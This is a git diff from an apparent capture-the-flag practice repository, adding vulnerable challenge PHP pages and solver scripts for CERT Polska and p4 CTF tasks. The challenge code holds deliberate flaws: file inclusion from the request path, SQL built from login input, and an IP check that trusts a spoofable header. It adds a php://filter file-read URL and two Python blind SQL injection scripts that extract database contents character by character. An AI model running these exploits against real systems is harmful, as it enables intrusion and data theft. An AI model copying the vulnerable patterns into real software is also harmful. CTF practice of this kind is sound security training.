terjanq
diff --git a/‎Practice/hackCERT/Podwojne-uwierzytelnianie/home.php
+8 b/‎Practice/hackCERT/Podwojne-uwierzytelnianie/home.php
+8
diff --git a/‎Practice/hackCERT/Podwojne-uwierzytelnianie/index.php
+35 b/‎Practice/hackCERT/Podwojne-uwierzytelnianie/index.php
+35
diff --git a/‎Practice/hackCERT/Podwojne-uwierzytelnianie/instructions.php
+56 b/‎Practice/hackCERT/Podwojne-uwierzytelnianie/instructions.php
+56
diff --git a/‎Practice/hackCERT/Podwojne-uwierzytelnianie/lfi
+1 b/‎Practice/hackCERT/Podwojne-uwierzytelnianie/lfi
+1
diff --git a/‎Practice/hackCERT/Podwojne-uwierzytelnianie/solve.py
+114 b/‎Practice/hackCERT/Podwojne-uwierzytelnianie/solve.py
+114
diff --git a/‎Practice/hackCERT/Security Blog/exploit.py
+124 b/‎Practice/hackCERT/Security Blog/exploit.py
+124
diff --git a/‎Practice/hackCERT/bulletproof/aaaaa
+25 b/‎Practice/hackCERT/bulletproof/aaaaa
+25
diff --git a/‎Practice/hackCERT/bulletproof/admin.php.corrupted.txt
2.02 KB b/‎Practice/hackCERT/bulletproof/admin.php.corrupted.txt
2.02 KB
@@ -0,0 +1,8 @@
+<?php if(!defined('APP')) { die('직접 접근 금지'); } ?>
+
+<h3>안녕하세요 운영진!</h3>
+
+<p>마지막 해킹 이후 우리는 새로운 보안 수단을 구현해야했습니다. 이제 우리는 이중 인증 방식을 사용합니다. 귀하의 IP가 영광스러운 북한에 속해 있음을 발견 할 수 있도록 VPN을 사용해야합니다.</p>
+
+<hr>
+<img src="/north-korea-is-best-korea.jpg">
@@ -0,0 +1,35 @@
+<?php
+ob_start();
+define('APP', 1);
+
+$page = preg_replace('$^\/index\.php\/?$', '', $_SERVER['PHP_SELF']);
+
+if (empty($page) || $page == 'index') {
+    header('Location: /index.php/home');
+}
+
+?>
+<html>
+<head>
+<style>
+body { background-color: #AA0000; color: white; font-size: 300%;}
+</style>
+</head>
+<body>
+
+<nav>
+    <a href="/index.php/home">집</a>
+    |
+    <a href="/index.php/instructions">명령</a>
+</nav>
+
+<hr />
+
+<?php
+
+include($page . '.php');
+
+?>
+
+</body>
+</html>
@@ -0,0 +1,56 @@
+<?php if(!defined('APP')) { die('직접 접근 금지'); }
+
+$ip = $_SERVER['HTTP_CLIENT_IP'] ?: ($_SERVER['HTTP_X_FORWARDED_FOR'] ?: $_SERVER['REMOTE_ADDR']);
+
+function ip_in_range($ip, $min, $max) {
+    return (ip2long($min) <= ip2long($ip) && ip2long($ip) <= ip2long($max));
+}
+
+if(ip_in_range($ip, '175.45.176.0', '175.45.179.255') ||
+   ip_in_range($ip, '210.52.109.0', '210.52.109.255') ||
+   ip_in_range($ip, '77.94.35.0', '77.94.35.255')) {
+    
+    if (!isset($_SERVER['PHP_AUTH_USER'])) {
+        header('HTTP/1.0 401 Unauthorized');
+        header('WWW-Authenticate: Basic realm="LOGIN"');
+    } else {
+        $login = $_SERVER['PHP_AUTH_USER'];
+        $password = $_SERVER['PHP_AUTH_PW'];
+        
+        $db = new PDO('sqlite:database.sqlite3');
+
+        $result = $db->query("select login, password from users where login = '$login'");
+        if (!$result) { die($db->errorInfo()[2]); }
+        $data = $result->fetchAll();
+
+        if(count($data) == 0) {
+            header('HTTP/1.0 401 Unauthorized');
+            header('WWW-Authenticate: Basic realm="NO USER"');
+        } elseif (md5($password) !== $data[0]['password']) {
+            header('HTTP/1.0 401 Unauthorized');
+            header('WWW-Authenticate: Basic realm="WRONG PASSWORD"');
+        } else {
+            print '<h2>안녕하십니까</h2>';
+
+            $result = $db->query("select message from instructions where login = '{$data[0]['login']}'");
+            if (!$result) { die($db->errorInfo()[2]); }
+            $data = $result->fetchAll();
+
+            if(count($data) == 0) {
+                print('<h3>메시지 없음</h3>');
+            } else {
+                print '<h3>여기에 당신을위한 메시지가 있습니다.:</h3>';
+
+                foreach($data as $row) {
+                    print "<p>- {$row['message']}</p>";
+                }
+            }
+        }
+    }
+} else {
+    ?>
+        <p>귀하의 지적 재산권은 영광 된 북한에 속해 있지 않습니다. VPN을 사용하면 사용자 이름과 비밀번호로 로그인 할 수 있습니다.</p>
+    <?php
+}
+
+?>
@@ -0,0 +1 @@
+http://ecsm2017.cert.pl:6044/index.php/php://filter/convert.base64-encode/resource=instructions
@@ -0,0 +1,114 @@
+import requests, urllib, re, sys, base64
+import random, string
+
+
+url_base = "http://ecsm2017.cert.pl:6044/index.php/instructions"
+url_login = url_base
+url_payload = url_base
+
+sessid = requests.Session()
+
+init_array = []
+sillent = False
+fancy_console = False
+
+ASCIIAlphabet = "\001 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
+simpleAlphabet = "\001abcdefghijklmnopqrstuvwxyz"
+HEXAlphabet = "\001-0123456789abcdef"
+advancedAlphabet= "\0010123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
+
+
+flag_payload = "a' or substr((select message from instructions), @wOFFSET@,1)>'@cORD@"
+
+headers = {'X-Forwarded-For': '175.45.176.1'}
+
+def printInPlace(alert):
+	if fancy_console:
+		sys.stdout.write("{}{}".format(alert, "\b"*len(alert)))
+		sys.stdout.flush();
+	return fancy_console
+
+def createPayload( query ):
+	return (query, 'aaa')
+
+def sendPayload ( query ):
+	if sillent == False: print ("exec: {}".format(query))
+	payload = createPayload(query)
+	add = requests.get(url_payload, auth=payload, allow_redirects=False, headers=headers)
+	return findIDs(add.headers)
+
+def logIn():
+	print ("loggin in: ")
+	sessid.get(url_login, allow_redirects=True)
+	return
+
+def findIDs(text):
+	return text
+
+def tryPayload(str):
+	headers = sendPayload(str)
+	return 'Basic realm="WRONG PASSWORD"' == headers['WWW-Authenticate']
+
+#bin-search ASCII inside [alphabet]
+def findName(payload, alphabet):
+	a = 0
+	b = len(alphabet)-1
+	while (a < b):
+		mid = (a+b)//2
+		c = alphabet[mid]
+		printInPlace(c)
+		if tryPayload(payload
+			.replace("@cORD@", c)
+			): a = mid + 1
+		else:
+			b = mid
+	return alphabet[a]
+
+
+def findNames(payload, alphabet):
+	for result_offset in range(0, 1000):
+		result = ""
+		pl = payload.replace("@rOFFSET@", str(result_offset))
+		for word_offset in range(1, 40):
+			pl2 = pl.replace("@wOFFSET@", str(word_offset))
+			c = findName(pl2, alphabet)
+			if c == alphabet[0]: break
+			sys.stdout.write(c)
+			sys.stdout.flush
+			result+=c
+		print(" ")
+		if len(result) <= 0: break
+	return
+
+
+
+
+def findTables():
+	print ("..:: Searching for table names ::..")
+	findNames(tables_payload, ASCIIAlphabet)
+
+def findSpiesrColumns():
+	print ("..:: Searching for column names in user ::..")
+	findNames(columns_spies_payload, advancedAlphabet)
+
+def findCtfColumns():
+	print ("..:: Searching for column names in point::..")
+	findNames(columns_ctf_payload, advancedAlphabet)
+
+
+def findFlag():
+	print ("..:: Searching for Admin hash ::..")
+	findNames(flag_payload, ASCIIAlphabet)
+
+
+
+fancy_console = True # Turn on fancy terminal output
+sillent = True # Turn off debugging mode
+
+
+# findTables();
+findFlag();
+
+
+
+# 08e0d3fa-7fe7-4157-94ab-724f07190840
@@ -0,0 +1,124 @@
+import requests, urllib, re, sys, base64
+
+url_base = "https://blog.pwning2017.p4.team"
+url_login = url_base;
+url_payload = url_base + "/submit";
+
+sessid = requests.Session()
+
+init_array = []
+sillent = False
+fancy_console = False
+
+ASCIIAlphabet = "\001 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
+simpleAlphabet = "\001abcdefghijklmnopqrstuvwxyz"
+HEXAlphabet = "\0010123456789abcdef"
+advancedAlphabet= "\0010123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
+
+flag_payload = "Ascii(substring((SELECT flag FROM ctf_flag WHERE 1 LIMIT @rOFFSET@,1),@wOFFSET@,1))>@cORD@"
+tables_payload = "Ascii(substring((SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT @rOFFSET@,1),@wOFFSET@,1))>@cORD@"
+
+columns_ctf_payload = "Ascii(substring((SELECT column_name FROM information_schema.columns WHERE table_name = 'ctf_flag' LIMIT @rOFFSET@,1),@wOFFSET@,1))>@cORD@"
+columns_blog_comments_payload = "Ascii(substring((SELECT column_name FROM information_schema.columns WHERE table_name = 'spies' LIMIT @rOFFSET@,1),@wOFFSET@,1))>@cORD@#"
+
+def printInPlace(alert):
+	if fancy_console:
+		sys.stdout.write("{}{}".format(alert, "\b"*len(alert)))
+		sys.stdout.flush();
+	return fancy_console
+
+def createPayload( query ):
+	return {"post_id": query, "text": "##HEHE##", "who": "none" }
+
+def sendPayload ( query ):
+	if sillent == False: print ("exec: {}".format(query))
+	payload = createPayload(query)
+	add = sessid.post(url_payload, payload, allow_redirects=True)
+	return findIDs(add.text)
+
+def logIn():
+	print ("loggin in: ")
+	sessid.get(url_login, allow_redirects=True)
+	return
+
+def findIDs(text):
+	regex = re.compile(r"(##HEHE##)")
+	matches = regex.findall(text)
+	return matches
+
+def tryPayload(str):
+	global init_array
+	old_arr = len(init_array)
+	init_array = sendPayload(str)
+	return len(init_array) > old_arr
+
+#bin-search ASCII inside [alphabet]
+def findName(payload, alphabet):
+	a = 0
+	b = len(alphabet)-1
+	while (a < b):
+		mid = (a+b)//2
+		c = alphabet[mid]
+		printInPlace(c)
+		if tryPayload(payload
+			.replace("@cORD@", str(ord(c)))
+			): a = mid + 1
+		else:
+			b = mid
+	return alphabet[a]
+
+
+def findNames(payload, alphabet):
+	for result_offset in range(0, 10):
+		result = ""
+		pl = payload.replace("@rOFFSET@", str(result_offset))
+		for word_offset in range(1, 40):
+			pl2 = pl.replace("@wOFFSET@", str(word_offset))
+			c = findName(pl2, alphabet)
+			if c == alphabet[0]: break
+			sys.stdout.write(c)
+			sys.stdout.flush
+			result+=c
+		print(" ")
+		if len(result) <= 1: break
+	return
+
+
+def findTables():
+	print ("..:: Searching for table names ::..")
+	findNames(tables_payload, advancedAlphabet)
+
+def findSpiesrColumns():
+	print ("..:: Searching for column names in user ::..")
+	findNames(columns_spies_payload, advancedAlphabet)
+
+def findCtfColumns():
+	print ("..:: Searching for column names in point::..")
+	findNames(columns_ctf_payload, advancedAlphabet)
+
+
+def findFlag():
+	print ("..:: Searching for Admin hash ::..")
+	findNames(flag_payload, ASCIIAlphabet)
+
+
+
+fancy_console = True # Turn on fancy terminal output
+sillent = True # Turn off debugging mode
+logIn();
+
+
+#deletePoints();
+#addPoints();
+init_array = sendPayload("1");
+
+print (init_array)
+# findTables();
+# findCtfColumns();
+findFlag()
+# findUsersColumns();
+# findSpiesrColumns();
+# findAdminHash();
+
+# findAdminHash();
+
@@ -0,0 +1,25 @@
+<?php
+
+require('../auth_funcs.php');
+
+ini_set('display_errors', 1);
+error_reporting(E_ALL);
+$auth = false;
+
+if (isset($_COOKIE['remember_me'])) {
+    $obj = json_decode($_COOKIE['remember_me'], true);
+    
+    if ($obj['login'] == 'demo' && $obj['token'] == getUserAuthToken('demo')) {
+        $auth = 'demo';
+    }
+    
+    if ($obj['login'] == 'admin' && $obj['token'] == getUserAuthToken('admin')) {
+        $auth = 'admin';
+    }
+}
+
+if (!$auth) {
+    echo('Sorry, you are not authenticated :(<br>');
+
+    if (isset($_COOKIE['remember_me'])) {
+        echo('<pre>'.htmlentities(var_ex
Original file line number	Diff line number	Diff line change
`@@ -0,0 +1 @@`
	`1`	`+http://ecsm2017.cert.pl:6044/index.php/php://filter/convert.base64-encode/resource=instructions`